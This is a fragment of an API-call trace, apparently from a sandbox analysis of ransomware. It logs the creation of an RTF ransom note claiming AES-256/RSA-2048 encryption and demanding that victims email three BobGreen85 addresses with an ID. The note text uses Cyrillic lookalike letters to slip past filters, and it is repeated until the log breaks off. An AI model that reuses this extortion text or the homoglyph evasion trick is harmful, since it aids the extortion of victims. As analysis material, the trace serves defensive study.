dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e4 [0064.899] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.899] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'ee\\f0\\lang1033 f \\f1\\lang1049\\'ee\\f0\\lang1033 ur 3 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e5\\f0\\lang1033 s. This is r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt b\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e0\\f0\\lang1033 us\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'ee\\f0\\lang1033 f d\\f1\\lang1049\\'e5\\f0\\lang1033 liv\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pr\\f1\\lang1049\\'ee\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 ms \\f1\\lang1049\\'ee\\f0\\lang1033 f s\\f1\\lang1049\\'ee\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il s\\f1\\lang1049\\'e5\\f0\\lang1033 rvi\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 s!\\par\r\n\\cf1 Important!\\cf0 If you haven't received a response from us within 24 hours, please try to use a different email service\\f1\\lang1049 (\\f0\\lang1033 Gmail, Yahoo, AOL, etc\\f1\\lang1049 )\\f0\\lang1033 .\\par\r\n\\cf1 Important!\\cf0 Please check your SPAM folder each time you wait for our response! If you find our email in the SPAM folder please move it to your Inbox.\\par\r\n\\cf1 Important! \\cf0 We are always in touch and ready to help you as soon as possible!\\par\r\n\\par\r\n\\b0\\f1\\lang1049\\'c0\\f0\\lang1033 tt\\f1\\lang1049\\'e0\\f0\\lang1033 ch up t\\f1\\lang1049\\'ee\\f0\\lang1033 3 sm\\f1\\lang1049\\'e0\\f0\\lang1033 ll \\f1\\lang1049\\'e5\\f0\\lang1033 ncr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d fil\\f1\\lang1049\\'e5\\f0\\lang1033 s f\\f1\\lang1049\\'ee\\f0\\lang1033 r fr\\f1\\lang1049\\'e5\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 ryption. Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te th\\f1\\lang1049\\'e0\\f0\\lang1033 t th\\f1\\lang1049\\'e5\\f0\\lang1033 fil\\f1\\lang1049\\'e5\\f0\\lang1033 s y\\f1\\lang1049\\'ee\\f0\\lang1033 u s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us sh\\f1\\lang1049\\'ee\\f0\\lang1033 uld n\\f1\\lang1049\\'ee\\f0\\lang1033 t c\\f1\\lang1049\\'ee\\f0\\lang1033 nt\\f1\\lang1049\\'e0\\f0\\lang1033 in \\f1\\lang1049\\'e0\\f0\\lang1033 n\\f1\\lang1049\\'f3\\f0\\lang1033 v\\f1\\lang1049\\'e0\\f0\\lang1033 lu\\f1\\lang1049\\'e0\\f0\\lang1033 bl\\f1\\lang1049\\'e5\\f0\\lang1033 inf\\f1\\lang1049\\'ee\\f0\\lang1033 rm\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\f1\\lang1049 \\f0\\lang1033 W\\f1\\lang1049\\'e5\\f0\\lang1033 will s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 u t\\f1\\lang1049\\'e5\\f0\\lang1033 st d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d files in \\f1\\lang1049\\'ee\\f0\\lang1033 ur r\\f1\\lang1049\\'e5\\f0\\lang1033 sp\\f1\\lang1049\\'ee\\f0\\lang1033 ns\\f1\\lang1049\\'e5\\f0\\lang1033 f\\f1\\lang1049\\'ee\\f0\\lang1033 r y\\f1\\lang1049\\'ee\\f0\\lang1033 ur c\\f1\\lang1049\\'ee\\f0\\lang1033 nfid\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 .\\par\r\nOf course you will receive all the necessary instructions h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e5\\f0\\lang1033 cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s!\\par\r\n\\par\r\n\\cf1\\b Important!\\par\r\n\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 te that we are professionals and just doing our job!\\par\r\nPlease d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t w\\f1\\lang1049\\'e0\\f0\\lang1033 st\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 tim\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd d\\f1\\lang1049\\'ee\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t tr\\f1\\lang1049\\'f3\\f0\\lang1033 to d\\f1\\lang1049\\'e5\\'f1\\'e5\\f0\\lang1033 ive us - it will r\\f1\\lang1049\\'e5\\f0\\lang1033 sult \\f1\\lang1049\\'ee\\f0\\lang1033 nly pri\\f1\\lang1049\\'f1\\'e5\\f0\\lang1033 incr\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 !\\par\r\nW\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 alw\\f1\\lang1049\\'e0\\'f3\\f0\\lang1033 s \\f1\\lang1049\\'ee\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'e5\\f0\\lang1033 d f\\f1\\lang1049\\'ee\\f0\\lang1033 r di\\f1\\lang1049\\'e0\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 g \\f1\\lang1049\\'e0\\f0\\lang1033 nd r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 dy t\\f1\\lang1049\\'ee\\f0\\lang1033 h\\f1\\lang1049\\'e5\\f0\\lang1033 lp \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n\\cf2\\fs28 uqpweo38\\cf0\\f1\\fs32\\lang1049\\par\r\n}\r\n", cchWideChar=7247, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7247 [0064.899] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\f0\\fs24\\lang1033 ALL YOUR VALUABLE DATA WAS ENCRYPTED!\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\par\r\n\\b0 All y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'f1\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'e5\\f0\\lang1033 d with str\\f1\\lang1049\\'ee\\f0\\lang1033 ng cr\\f1\\lang1049\\'f3\\f0\\lang1033 pt\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 lg\\f1\\lang1049\\'ee\\f0\\lang1033 rithm \\f1\\lang1049\\'c0\\'c5\\f0\\lang1033 S-256 + RS\\f1\\lang1049\\'c0\\f0\\lang1033 -2048.\\par\r\nPl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 sur\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e0\\f0\\lang1033 t y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s \\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 n\\f1\\lang1049\\'ee\\f0\\lang1033 t br\\f1\\lang1049\\'ee\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 n \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u c\\f1\\lang1049\\'e0\\f0\\lang1033 n r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 m t\\f1\\lang1049\\'ee\\f0\\lang1033 d\\f1\\lang1049\\'e0\\f0\\lang1033 y.\\par\r\n\\par\r\nIf y\\f1\\lang1049\\'ee\\f0\\lang1033 u r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 ll\\f1\\lang1049\\'f3\\f0\\lang1033 w\\f1\\lang1049\\'e0\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 st\\f1\\lang1049\\'ee\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 y\\f1\\lang1049\\'ee\\f0\\lang1033 ur fil\\f1\\lang1049\\'e5\\f0\\lang1033 s pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 us t\\f1\\lang1049\\'ee\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 -m\\f1\\lang1049\\'e0\\f0\\lang1033 ils:\\par\r\n\\b\\fs28 BobGreen85@criptext.com\\par\r\nBobGreen85@aol.com\\par\r\nBobGreen85@tutanota.com\\par\r\n\\b0\\fs24 In subj\\f1\\lang1049\\'e5\\f0\\lang1033 ct lin\\f1\\lang1049\\'e5\\f0\\lang1033 writ\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b\\fs28 2660EAA9CA5C3071\\fs24\\par\r\n\\par\r\n\\cf1 Imp\\f1\\lang1049\\'ee\\f0\\lang1033 rt\\f1\\lang1049\\'e0\\f0\\lang1033 nt!\\cf0 Pl\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd y\\f1\\lang1049\\'ee\\f0\\lang1033 ur m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 t\\f1\\lang1049\\'ee\\f0\\lang1033 